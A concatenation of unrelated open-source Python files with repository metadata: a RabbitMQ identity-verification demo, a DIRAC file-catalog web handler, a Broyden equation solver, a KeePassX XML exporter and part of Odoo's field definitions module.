def __init__(self, user_id="guest",header={},exchange_info = NIST_EXCHANGE,settings=None):
import sys
import json
sys.path.append("..")
import modules.NISTutility as nu
super(Broker, self).__init__("NISTExtractor", user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
NISTResult=nu.convertNIST(eftname,'jpg','new_i'+eftname)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
class MsgLog(MessageQueue):
# the logging class - binds to the fire_host
def __init__(self, user_id="guest",header={},settings=None):
super(MsgLog, self).__init__("Logger", user_id,settings=settings)
self.channel.queue_declare(queue='firehose-queue', durable=False,auto_delete=True, exclusive=True)
self.request_queue=self.queue_bind({"name":"Results"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Web"},queue_name= 'firehose-queue', routing_key='#')
#self.request_queue=self.queue_bind({"name":"Request"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Identify"},queue_name= 'firehose-queue', routing_key='#')
def on_recieve_callback(self, ch, method, properties, body):
#self.log(body)
if 'requester' in properties.headers:
self.log("from %s for %s to %s"%( properties.headers['requester'], properties.headers['destination']['name'], properties.headers['last_node']))
self.log(str(properties.user_id))
#else:
#self.log(str(properties)) body))
#self.log(str(method))
#self.log(str(
def start(self, ):
self.start_consume(self.request_queue)
class Matcher(MessageBrokerBase):
# the matcher class - binds to the IDENTIFY_EXCHANGE
# undertakes match and puts return on the RESULTS_EXCHANGE queue with the routing_key of the name
def __init__(self, node_name, user_id="guest",header={},exchange_info = IDENTIFY_EXCHANGE,settings=None):
header.update({"from_node":node_name})
super(Matcher, self).__init__(node_name, user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Matcher,self).on_recieve_callback(ch, method, properties, body)
self.log('Matching '+str(properties.headers))
if 'requester' in properties.headers and not(self.node_name == properties.headers['requester']): # make sure not to match our own request
body = "Match score = %f from %s"%(random.random(),self.node_name)
self.log("doing match - sending "+body)
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
self.log("my exchange is "+str(exchange))
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
class Requester(MessageQueue):
# the match request class - sends a request on the REQUEST_EXCHANGE
def __init__(self, node_name, user_id="guest",settings=None):
super(Requester, self).__init__(node_name, user_id,settings=settings)
def send(self, msg,header):
header.update({self.node_name:True,'requester':self.node_name})
super(Requester,self).send(REQUEST_EXCHANGE,msg,header,True)
class Receiver(MessageBrokerBase):
# retrieve the results from the RESULTS_EXCHANGE
def __init__(self, node_name, user_id="guest",header={},exchange_info = RESULTS_EXCHANGE,settings=None):
super(Receiver, self).__init__(node_name, user_id,header, exchange_info, settings=settings,routing_key=node_name) #routing_key=node_name,
def on_recieve_callback(self, ch, method, properties, body):
super(Receiver,self).on_recieve_callback(ch, method, properties, body)
self.log("recieved "+body)
if __name__ == "__main__":
import argparse
from subprocess import check_call
# Parse command line args
# note that args can be read from a file using the @ command
parser = argparse.ArgumentParser(description='Identity Verification Service',fromfile_prefix_chars='@')
parser.add_argument('--rabbitmq_host', default='localhost',
help='set the rabbitmq url (default localhost)')
parser.add_argument('--redis_host', default='localhost',
help='set the redis url (default localhost)')
parser.add_argument('--redis_port', default=6379,
help='set the redis port (default 6379)')
parser.add_argument('--is_broker','-b', action='store_true',
help='Is the broker')
parser.add_argument('--is_matcher','-m', action='store_true',
help='Is a matcher')
parser.add_argument('--is_requester','-r', action='store_true',
help='Is a requester')
parser.add_argument('--is_receiver','-e', action='store_true',
help='Is a reciever')
parser.add_argument('--is_logger','-l', action='store_true',
help='Is a logger')
parser.add_argument('--name','-n', default='[No Name]',
help='Name of the agency/node')
parser.add_argument('--version', action='version', version='%(prog)s '+str(VERSION))
args = parser.parse_args()
header={"test":"test"}
if args.is_matcher:
check_call('python rabbitmqadmin.py declare user name="%s" password="guest" tags="Australia_NZ,Bali"'%args.name,shell=True)
s = 'python rabbitmqadmin.py declare permission vhost="/" user="%s" configure=".*" write=".*" read=".*"'%args.name
check_call(s,shell=True)
matcher = Matcher(args.name,args.name,header,settings=args)
matcher.start()
elif args.is_broker:
broker = Broker("broker",header,settings=args)
#queue=broker.queue_bind(dest_queue, header)
broker.start() #_consume(queue)
elif args.is_requester:
requester = Requester(args.name,args.name,settings=args)
requester.send("Hello",header)
elif args.is_receiver:
receiver = Receiver(args.name,args.name,{args.name:True},settings=args)
receiver.start()
elif args.is_logger:
logger = MsgLog("broker",header,settings=args)
logger.start()
#sendRequest(my_queue, dest_queue, priority, m_type, d_file)
| ted-dunstone/ivs | hub_demo/send_msg.py | Python | mit | 11,161 | 0.021862 |
from chula.www.controller.base import Controller
| jmcfarlane/chula | chula/www/controller/__init__.py | Python | gpl-2.0 | 49 | 0 |
from WebAppDIRAC.Lib.WebHandler import WebHandler, asyncGen
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC import gConfig, gLogger
from DIRAC.Core.Utilities import Time
from hashlib import md5
class FileCatalogHandler( WebHandler ):
AUTH_PROPS = "authenticated"
def __init__(self, *args, **kwargs ):
super( FileCatalogHandler, self ).__init__( *args, **kwargs )
sessionData = self.getSessionData()
self.user = sessionData['user'].get( 'username', '' )
self.group = sessionData['user'].get( 'group', '' )
self.vo = getVOForGroup( self.group )
self.fc = FileCatalog( vo = self.vo )
'''
Method to read all the available fields possible for defining a query
'''
@asyncGen
def web_getMetadataFields(self):
self.L_NUMBER = 0
self.S_NUMBER = 0
result = yield self.threadTask( self.fc.getMetadataFields )
gLogger.debug( "request: %s" % result )
if not result[ "OK" ] :
gLogger.error( "getSelectorGrid: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result["Value"]
callback = {}
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
filemeta = result[ "FileMetaFields" ]
if len( filemeta ) > 0 :
for key , value in filemeta.items():
callback[key]= "label"
gLogger.debug( "getSelectorGrid: FileMetaFields callback %s" % callback )
dirmeta = result[ "DirectoryMetaFields" ]
if len( dirmeta ) > 0 :
for key , value in dirmeta.items():
callback[key]= value.lower()
gLogger.debug( "getSelectorGrid: Resulting callback %s" % callback )
self.finish({ "success" : "true" , "result" : callback})
'''
Method to read all the available options for a metadata field
'''
@asyncGen
def web_getQueryData( self ):
try:
compat = dict()
for key in self.request.arguments:
parts = str( key ).split(".")
if len(parts)!=3:
continue
key = str( key )
name = parts[1]
sign = parts[2]
if not len( name ) > 0:
continue
value = str( self.request.arguments[ key ][0] ).split("|")
#check existence of the 'name' section
if not compat.has_key(name):
compat[name] = dict()
#check existence of the 'sign' section
if not compat[name].has_key(sign):
if value[0]=="v":
compat[name][sign] = ""
elif value[0]=="s":
compat[name][sign] = []
if value[0]=="v":
compat[name][sign] = value[1]
elif value[0]=="s":
compat[name][sign] += value[1].split(":::")
except Exception, e:
self.finish({ "success" : "false" , "error" : "Metadata query error" })
return
path = "/"
if self.request.arguments.has_key("path") :
path = self.request.arguments["path"][0]
gLogger.always( compat )
result = yield self.threadTask( self.fc.getCompatibleMetadata, compat, path )
gLogger.always( result )
if not result[ "OK" ]:
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
self.finish({ "success" : "true" , "result" : result["Value"] })
@asyncGen
def web_getFilesData( self ) :
req = self.__request()
gLogger.always(req)
gLogger.debug( "submit: incoming request %s" % req )
result = yield self.threadTask( self.fc.findFilesByMetadataWeb, req["selection"] , req["path"] , self.S_NUMBER , self.L_NUMBER)
gLogger.debug( "submit: result of findFilesByMetadataDetailed %s" % result )
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result[ "Value" ]
if not len(result) > 0:
self.finish({ "success" : "true" , "result" : [] , "total" : 0, "date":"-" })
return
total = result[ "TotalRecords" ]
result = result[ "Records" ]
callback = list()
for key , value in result.items() :
size = ""
if "Size" in value:
size = value[ "Size" ]
date = ""
if "CreationDate" in value:
date = str( value[ "CreationDate" ] )
meta = ""
if "Metadata" in value:
m = value[ "Metadata" ]
meta = '; '.join( [ '%s: %s' % ( i , j ) for ( i , j ) in m.items() ] )
dirnameList = key.split("/")
dirname = "/".join(dirnameList[:len(dirnameList)-1])
filename = dirnameList[len(dirnameList)-1:]
callback.append({"fullfilename":key, "dirname": dirname, "filename" : filename , "date" : date , "size" : size ,
"metadata" : meta })
timestamp = Time.dateTime().strftime("%Y-%m-%d %H:%M [UTC]")
self.finish({ "success" : "true" , "result" : callback , "total" : total, "date":timestamp})
def __request(self):
req = { "selection" : {} , "path" : "/" }
self.L_NUMBER = 25
if self.request.arguments.has_key( "limit" ) and len( self.request.arguments[ "limit" ][0] ) > 0:
self.L_NUMBER = int( self.request.arguments[ "limit" ][0] )
self.S_NUMBER = 0
if self.request.arguments.has_key( "start" ) and len( self.request.arguments[ "start" ][0] ) > 0:
self.S_NUMBER = int( self.request.arguments[ "start" ][0] )
result = gConfig.getOption( "/WebApp/ListSeparator" )
if result[ "OK" ] :
separator = result[ "Value" ]
else:
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "request: %s" % result[ "Message" ] )
return req
result = result["Value"]
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
filemeta = result[ "FileMetaFields" ]
dirmeta = result[ "DirectoryMetaFields" ]
meta = []
for key,value in dirmeta.items() :
meta.append( key )
gLogger.always( "request: metafields: %s " % meta )
for param in self.request.arguments :
tmp = str( param ).split( '.' )
if len( tmp ) != 3 :
continue
name = tmp[1]
logic = tmp[2]
value = self.request.arguments[param][0].split("|")
if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] :
gLogger.always( "Operand '%s' is not supported " % logic )
continue
if name in meta :
#check existence of the 'name' section
if not req[ "selection" ].has_key(name):
req[ "selection" ][name] = dict()
#check existence of the 'sign' section
if not req[ "selection" ][name].has_key(logic):
if value[0]=="v":
req[ "selection" ][name][logic] = ""
elif value[0]=="s":
req[ "selection" ][name][logic] = []
if value[0]=="v":
req[ "selection" ][name][logic] = value[1]
elif value[0]=="s":
req[ "selection" ][name][logic] += value[1].split(":::")
if self.request.arguments.has_key("path") :
req["path"] = self.request.arguments["path"][0]
gLogger.always("REQ: ",req)
return req
def __request_file(self):
req = { "selection" : {} , "path" : "/" }
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "request: %s" % result[ "Message" ] )
return req
result = result["Value"]
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
filemeta = result[ "FileMetaFields" ]
dirmeta = result[ "DirectoryMetaFields" ]
meta = []
for key,value in dirmeta.items() :
meta.append( key )
gLogger.always( "request: metafields: %s " % meta )
selectionElems=self.request.arguments["selection"][0].split("<|>")
gLogger.always( "request: THISSSS %s " % self.request.arguments["selection"][0] )
for param in selectionElems:
tmp = str( param ).split( '|' )
if len( tmp ) != 4 :
continue
name = tmp[0]
logic = tmp[1]
if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] :
gLogger.always( "Operand '%s' is not supported " % logic )
continue
if name in meta :
#check existence of the 'name' section
if not req[ "selection" ].has_key(name):
req[ "selection" ][name] = dict()
#check existence of the 'sign' section
if not req[ "selection" ][name].has_key(logic):
if tmp[2]=="v":
req[ "selection" ][name][logic] = ""
elif tmp[2]=="s":
req[ "selection" ][name][logic] = []
if tmp[2]=="v":
req[ "selection" ][name][logic] = tmp[3]
elif tmp[2]=="s":
req[ "selection" ][name][logic] += tmp[3].split(":::")
if self.request.arguments.has_key("path") :
req["path"] = self.request.arguments["path"][0]
gLogger.always("REQ: ",req)
return req
@asyncGen
def web_getMetadataFilesInFile( self ):
self.set_header('Content-type','text/plain')
self.set_header('Content-Disposition', 'attachment; filename="error.txt"')
req = self.__request_file()
gLogger.always(req)
gLogger.debug( "submit: incoming request %s" % req )
result = yield self.threadTask( self.fc.findFilesByMetadata, req["selection"] , req["path"])
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result[ "Value" ]
retStrLines = []
if len(result)>0:
for fileName in result:
retStrLines.append(fileName)
strData = "\n".join(retStrLines)
self.set_header('Content-type','text/plain')
self.set_header('Content-Disposition', 'attachment; filename="%s.txt"' % md5( str( req ) ).hexdigest())
self.set_header('Content-Length', len( strData ))
self.finish(strData)
@asyncGen
def web_getSubnodeFiles( self ):
path = self.request.arguments["path"][0]
# print path
# path = "/vo.cta.in2p3.fr"
result = yield self.threadTask( self.fc.listDirectory, path, False)
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
# print result
filesData = result["Value"]["Successful"][path]["Files"]
dirData = result["Value"]["Successful"][path]["SubDirs"]
retData = []
for entryName in dirData:
nodeDef = { 'text' : entryName.split("/")[-1] }
nodeDef[ 'leaf' ] = False
nodeDef[ 'expanded' ] = False
retData.append(nodeDef)
for entryName in filesData:
nodeDef = { 'text' : entryName.split("/")[-1] }
nodeDef[ 'leaf' ] = True
retData.append(nodeDef)
retData = sorted(retData, key=lambda node: node['text'].upper())
self.finish({"success" : "true", "nodes":retData})
| zmathe/WebAppDIRAC | WebApp/handler/FileCatalogHandler.py | Python | gpl-3.0 | 12,082 | 0.048088 |
#!/usr/bin/env python3
from erros import NaoConverge
from numpy import matrix
from numpy.linalg import inv
from numpy.linalg import norm
def SolucaoEqNLinearBroyden(xin, bi, tol, niter, F):
xold = xin
bold = matrix(bi)
tolerancia = 1
while (tolerancia > tol and niter != -1):
f = matrix(F(xold))
if f.size == 1:
f = f.transpose()
j = bold
jinv = inv(j)
deltax = -1 * jinv * f
deltax = deltax.transpose() #usado para realizar a soma com Xold
xnew = deltax + xold
deltax = deltax.transpose() #voltar ao normal
xnew = list(xnew.flat)
y = matrix(F(xnew)) - matrix(F(xold))
bnew = bold + ((y - bold*deltax)*deltax.transpose()) / (deltax.transpose()*deltax)
tolerancia = norm(deltax) / norm(xnew)
niter -= 1
xold = xnew
bold = bnew
if niter == -1:
raise NaoConverge
return xold
if __name__ == "__main__":
F = lambda x: [[x[0] + 2 * x[1] - 2], [x[0]*x[0] + 4 * x[1]*x[1] - 4]]
try:
print(SolucaoEqNLinearBroyden([2,3], [[1,2],[4,24]], 0.0001, 100, F))
except NaoConverge:
print("Convergence not reached")
| paulocsanz/algebra-linear | scripts/eq_n_linear_broyden.py | Python | agpl-3.0 | 1,262 | 0.011094 |
"""
Support for exporting database to KeePassX XML format.
"""
from __future__ import absolute_import
from datetime import datetime
from xml.etree import ElementTree as ET
from xml.dom import minidom
from keepassdb import const
class XmlExporter(object):
"""
Class for exporting database to KeePassX XML format.
:ivar include_comment: Whether to include a 'generated-by' comment in the header.
:ivar prettyprint: Whether to generate pretty-printed XML (indent, etc.).
"""
include_comment = False
prettyprint = True
def __init__(self, include_comment=False, prettyprint=True):
self.include_comment = include_comment
self.prettyprint = prettyprint
def export(self, db):
"""
Export the dbnode to KeePassX XML format.
:param db: The database to export.
:type db: :class:`keepassdb.db.Database`
"""
dbnode = ET.Element('database')
if self.include_comment:
now = datetime.now()
filepath = db.filepath
if filepath:
comment = ET.Comment('Generated by keepassdb from {0} on {1}'.format(filepath, now.strftime("%c")))
else:
comment = ET.Comment('Generated by keepassdb on {0}'.format(now.strftime("%c")))
dbnode.append(comment)
def _date(dt):
if dt == const.NEVER:
return 'Never'
else:
# 2012-12-20T20:56:56
return dt.strftime('%Y-%m-%dT%H:%M:%S')
def group_to_xml(group, node):
gnode = ET.SubElement(node, 'group')
title = ET.SubElement(gnode, 'title')
title.text = group.title
icon = ET.SubElement(gnode, 'icon')
icon.text = str(group.icon)
for subgroup in group.children:
group_to_xml(subgroup, gnode)
for entry in group.entries:
if entry.title == 'Meta-Info' and entry.username == 'SYSTEM':
continue
enode = ET.SubElement(gnode, 'entry')
ET.SubElement(enode, 'title').text = entry.title
ET.SubElement(enode, 'username').text = entry.username
ET.SubElement(enode, 'password').text = entry.password
ET.SubElement(enode, 'url').text = entry.url
ET.SubElement(enode, 'comment').text = entry.notes
ET.SubElement(enode, 'icon').text = str(entry.icon)
ET.SubElement(enode, 'creation').text = _date(entry.created)
ET.SubElement(enode, 'lastaccess').text = _date(entry.accessed)
ET.SubElement(enode, 'lastmod').text = _date(entry.modified)
ET.SubElement(enode, 'expire').text = _date(entry.expires)
return gnode
for group in db.root.children:
dbnode.append(group_to_xml(group, dbnode))
xmlstr = ET.tostring(dbnode)
if self.prettyprint:
reparsed = minidom.parseString(xmlstr)
xmlstr = reparsed.toprettyxml(indent=" ")
return xmlstr | hozn/keepassdb | keepassdb/export/xml.py | Python | gpl-3.0 | 3,206 | 0.005614 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" High-level objects for fields. """
from datetime import date, datetime
from functools import partial
from operator import attrgetter
from types import NoneType
import logging
import pytz
import xmlrpclib
from openerp.tools import float_round, ustr, html_sanitize
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT
DATE_LENGTH = len(date.today().strftime(DATE_FORMAT))
DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT))
_logger = logging.getLogger(__name__)
class SpecialValue(object):
""" Encapsulates a value in the cache in place of a normal value. """
def __init__(self, value):
self.value = value
def get(self):
return self.value
class FailedValue(SpecialValue):
""" Special value that encapsulates an exception instead of a value. """
def __init__(self, exception):
self.exception = exception
def get(self):
raise self.exception
def _check_value(value):
""" Return `value`, or call its getter if `value` is a :class:`SpecialValue`. """
return value.get() if isinstance(value, SpecialValue) else value
def resolve_all_mro(cls, name, reverse=False):
""" Return the (successively overridden) values of attribute `name` in `cls`
in mro order, or inverse mro order if `reverse` is true.
"""
klasses = reversed(cls.__mro__) if reverse else cls.__mro__
for klass in klasses:
if name in klass.__dict__:
yield klass.__dict__[name]
class MetaField(type):
""" Metaclass for field classes. """
by_type = {}
def __init__(cls, name, bases, attrs):
super(MetaField, cls).__init__(name, bases, attrs)
if cls.type:
cls.by_type[cls.type] = cls
# compute class attributes to avoid calling dir() on fields
cls.column_attrs = []
cls.related_attrs = []
cls.description_attrs = []
for attr in dir(cls):
if attr.startswith('_column_'):
cls.column_attrs.append((attr[8:], attr))
elif attr.startswith('_related_'):
cls.related_attrs.append((attr[9:], attr))
elif attr.startswith('_description_'):
cls.description_attrs.append((attr[13:], attr))
class Field(object):
""" The field descriptor contains the field definition, and manages accesses
and assignments of the corresponding field on records. The following
attributes may be provided when instanciating a field:
:param string: the label of the field seen by users (string); if not
set, the ORM takes the field name in the class (capitalized).
:param help: the tooltip of the field seen by users (string)
:param readonly: whether the field is readonly (boolean, by default ``False``)
:param required: whether the value of the field is required (boolean, by
default ``False``)
:param index: whether the field is indexed in database (boolean, by
default ``False``)
:param default: the default value for the field; this is either a static
value, or a function taking a recordset and returning a value
:param states: a dictionary mapping state values to lists of UI attribute-value
pairs; possible attributes are: 'readonly', 'required', 'invisible'.
Note: Any state-based condition requires the ``state`` field value to be
available on the client-side UI. This is typically done by including it in
the relevant views, possibly made invisible if not relevant for the
end-user.
:param groups: comma-separated list of group xml ids (string); this
restricts the field access to the users of the given groups only
:param bool copy: whether the field value should be copied when the record
is duplicated (default: ``True`` for normal fields, ``False`` for
``one2many`` and computed fields, including property fields and
related fields)
:param string oldname: the previous name of this field, so that ORM can rename
it automatically at migration
.. _field-computed:
.. rubric:: Computed fields
One can define a field whose value is computed instead of simply being
read from the database. The attributes that are specific to computed
fields are given below. To define such a field, simply provide a value
for the attribute `compute`.
:param compute: name of a method that computes the field
:param inverse: name of a method that inverses the field (optional)
:param search: name of a method that implement search on the field (optional)
:param store: whether the field is stored in database (boolean, by
default ``False`` on computed fields)
The methods given for `compute`, `inverse` and `search` are model
methods. Their signature is shown in the following example::
upper = fields.Char(compute='_compute_upper',
inverse='_inverse_upper',
search='_search_upper')
@api.depends('name')
def _compute_upper(self):
for rec in self:
self.upper = self.name.upper() if self.name else False
def _inverse_upper(self):
for rec in self:
self.name = self.upper.lower() if self.upper else False
def _search_upper(self, operator, value):
if operator == 'like':
operator = 'ilike'
return [('name', operator, value)]
The compute method has to assign the field on all records of the invoked
recordset. The decorator :meth:`openerp.api.depends` must be applied on
the compute method to specify the field dependencies; those dependencies
are used to determine when to recompute the field; recomputation is
automatic and guarantees cache/database consistency. Note that the same
method can be used for several fields, you simply have to assign all the
given fields in the method; the method will be invoked once for all
those fields.
By default, a computed field is not stored to the database, and is
computed on-the-fly. Adding the attribute ``store=True`` will store the
field's values in the database. The advantage of a stored field is that
searching on that field is done by the database itself. The disadvantage
is that it requires database updates when the field must be recomputed.
The inverse method, as its name says, does the inverse of the compute
method: the invoked records have a value for the field, and you must
apply the necessary changes on the field dependencies such that the
computation gives the expected value. Note that a computed field without
an inverse method is readonly by default.
The search method is invoked when processing domains before doing an
actual search on the model. It must return a domain equivalent to the
condition: `field operator value`.
.. _field-related:
.. rubric:: Related fields
The value of a related field is given by following a sequence of
relational fields and reading a field on the reached model. The complete
sequence of fields to traverse is specified by the attribute
:param related: sequence of field names
Some field attributes are automatically copied from the source field if
they are not redefined: `string`, `help`, `readonly`, `required` (only
if all fields in the sequence are required), `groups`, `digits`, `size`,
`translate`, `sanitize`, `selection`, `comodel_name`, `domain`,
`context`. All semantic-free attributes are copied from the source
field.
By default, the values of related fields are not stored to the database.
Add the attribute ``store=True`` to make it stored, just like computed
fields. Related fields are automatically recomputed when their
dependencies are modified.
.. _field-company-dependent:
.. rubric:: Company-dependent fields
Formerly known as 'property' fields, the value of those fields depends
on the company. In other words, users that belong to different companies
may see different values for the field on a given record.
:param company_dependent: whether the field is company-dependent (boolean)
.. _field-incremental-definition:
.. rubric:: Incremental definition
A field is defined as class attribute on a model class. If the model
is extended (see :class:`~openerp.models.Model`), one can also extend
the field definition by redefining a field with the same name and same
type on the subclass. In that case, the attributes of the field are
taken from the parent class and overridden by the ones given in
subclasses.
For instance, the second class below only adds a tooltip on the field
``state``::
class First(models.Model):
_name = 'foo'
state = fields.Selection([...], required=True)
class Second(models.Model):
_inherit = 'foo'
state = fields.Selection(help="Blah blah blah")
"""
__metaclass__ = MetaField
_attrs = None # dictionary with all field attributes
_free_attrs = None # list of semantic-free attribute names
automatic = False # whether the field is automatically created ("magic" field)
inherited = False # whether the field is inherited (_inherits)
column = None # the column corresponding to the field
setup_done = False # whether the field has been set up
name = None # name of the field
type = None # type of the field (string)
relational = False # whether the field is a relational one
model_name = None # name of the model of this field
comodel_name = None # name of the model of values (if relational)
inverse_fields = None # list of inverse fields (objects)
store = True # whether the field is stored in database
index = False # whether the field is indexed in database
manual = False # whether the field is a custom field
copy = True # whether the field is copied over by BaseModel.copy()
depends = () # collection of field dependencies
recursive = False # whether self depends on itself
compute = None # compute(recs) computes field on recs
inverse = None # inverse(recs) inverses field on recs
search = None # search(recs, operator, value) searches on self
related = None # sequence of field names, for related fields
related_sudo = True # whether related fields should be read as admin
company_dependent = False # whether `self` is company-dependent (property field)
default = None # default(recs) returns the default value
string = None # field label
help = None # field tooltip
readonly = False
required = False
states = None
groups = False # csv list of group xml ids
change_default = None # whether the field may trigger a "user-onchange"
deprecated = None # whether the field is ... deprecated
def __init__(self, string=None, **kwargs):
kwargs['string'] = string
self._attrs = {key: val for key, val in kwargs.iteritems() if val is not None}
self._free_attrs = []
def new(self, **kwargs):
""" Return a field of the same type as `self`, with its own parameters. """
return type(self)(**kwargs)
def set_class_name(self, cls, name):
""" Assign the model class and field name of `self`. """
self.model_name = cls._name
self.name = name
# determine all inherited field attributes
attrs = {}
for field in resolve_all_mro(cls, name, reverse=True):
if isinstance(field, type(self)):
attrs.update(field._attrs)
else:
attrs.clear()
attrs.update(self._attrs) # necessary in case self is not in cls
# initialize `self` with `attrs`
if attrs.get('compute'):
# by default, computed fields are not stored, not copied and readonly
attrs['store'] = attrs.get('store', False)
attrs['copy'] = attrs.get('copy', False)
attrs['readonly'] = attrs.get('readonly', not attrs.get('inverse'))
if attrs.get('related'):
# by default, related fields are not stored
attrs['store'] = attrs.get('store', False)
# fix for function fields overridden by regular columns
if not isinstance(attrs.get('column'), (NoneType, fields.function)):
attrs.pop('store', None)
for attr, value in attrs.iteritems():
if not hasattr(self, attr):
self._free_attrs.append(attr)
setattr(self, attr, value)
if not self.string and not self.related:
# related fields get their string from their parent field
self.string = name.replace('_', ' ').capitalize()
# determine self.default and cls._defaults in a consistent way
self._determine_default(cls, name)
self.reset()
def _determine_default(self, cls, name):
""" Retrieve the default value for `self` in the hierarchy of `cls`, and
determine `self.default` and `cls._defaults` accordingly.
"""
self.default = None
# traverse the class hierarchy upwards, and take the first field
# definition with a default or _defaults for self
for klass in cls.__mro__:
if name in klass.__dict__:
field = klass.__dict__[name]
if not isinstance(field, type(self)):
# klass contains another value overridden by self
return
if 'default' in field._attrs:
# take the default in field, and adapt it for cls._defaults
value = field._attrs['default']
if callable(value):
from openerp import api
self.default = value
cls._defaults[name] = api.model(
lambda recs: self.convert_to_write(value(recs))
)
else:
self.default = lambda recs: value
cls._defaults[name] = value
return
defaults = klass.__dict__.get('_defaults') or {}
if name in defaults:
# take the value from _defaults, and adapt it for self.default
value = defaults[name]
if callable(value):
func = lambda recs: value(recs._model, recs._cr, recs._uid, recs._context)
else:
func = lambda recs: value
self.default = lambda recs: self.convert_to_cache(
func(recs), recs, validate=False,
)
cls._defaults[name] = value
return
def __str__(self):
return "%s.%s" % (self.model_name, self.name)
def __repr__(self):
return "%s.%s" % (self.model_name, self.name)
############################################################################
#
# Field setup
#
def reset(self):
""" Prepare `self` for a new setup. """
self.setup_done = False
# self._triggers is a set of pairs (field, path) that represents the
# computed fields that depend on `self`. When `self` is modified, it
# invalidates the cache of each `field`, and registers the records to
# recompute based on `path`. See method `modified` below for details.
self._triggers = set()
self.inverse_fields = []
def setup(self, env):
""" Complete the setup of `self` (dependencies, recomputation triggers,
and other properties). This method is idempotent: it has no effect
if `self` has already been set up.
"""
if not self.setup_done:
self._setup(env)
self.setup_done = True
def _setup(self, env):
""" Do the actual setup of `self`. """
if self.related:
self._setup_related(env)
else:
self._setup_regular(env)
# put invalidation/recomputation triggers on field dependencies
model = env[self.model_name]
for path in self.depends:
self._setup_dependency([], model, path.split('.'))
# put invalidation triggers on model dependencies
for dep_model_name, field_names in model._depends.iteritems():
dep_model = env[dep_model_name]
dep_model._setup_fields()
for field_name in field_names:
field = dep_model._fields[field_name]
field._triggers.add((self, None))
#
# Setup of related fields
#
def _setup_related(self, env):
""" Setup the attributes of a related field. """
# fix the type of self.related if necessary
if isinstance(self.related, basestring):
self.related = tuple(self.related.split('.'))
# determine the chain of fields, and make sure they are all set up
recs = env[self.model_name]
fields = []
for name in self.related:
recs._setup_fields()
field = recs._fields[name]
field.setup(env)
recs = recs[name]
fields.append(field)
self.related_field = field
# check type consistency
if self.type != field.type:
raise Warning("Type of related field %s is inconsistent with %s" % (self, field))
# determine dependencies, compute, inverse, and search
self.depends = ('.'.join(self.related),)
self.compute = self._compute_related
self.inverse = self._inverse_related
if field._description_searchable:
# allow searching on self only if the related field is searchable
self.search = self._search_related
# copy attributes from field to self (string, help, etc.)
for attr, prop in self.related_attrs:
if not getattr(self, attr):
setattr(self, attr, getattr(field, prop))
for attr in field._free_attrs:
if attr not in self._free_attrs:
self._free_attrs.append(attr)
setattr(self, attr, getattr(field, attr))
# special case for states: copy it only for inherited fields
if not self.states and self.inherited:
self.states = field.states
# special case for required: check if all fields are required
if not self.store and not self.required:
self.required = all(field.required for field in fields)
def _compute_related(self, records):
""" Compute the related field `self` on `records`. """
# when related_sudo, bypass access rights checks when reading values
others = records.sudo() if self.related_sudo else records
for record, other in zip(records, others):
if not record.id:
# draft record, do not switch to another environment
other = record
# traverse the intermediate fields; follow the first record at each step
for name in self.related[:-1]:
other = other[name][:1]
record[self.name] = other[self.related[-1]]
def _inverse_related(self, records):
""" Inverse the related field `self` on `records`. """
for record in records:
other = record
# traverse the intermediate fields, and keep at most one record
for name in self.related[:-1]:
other = other[name][:1]
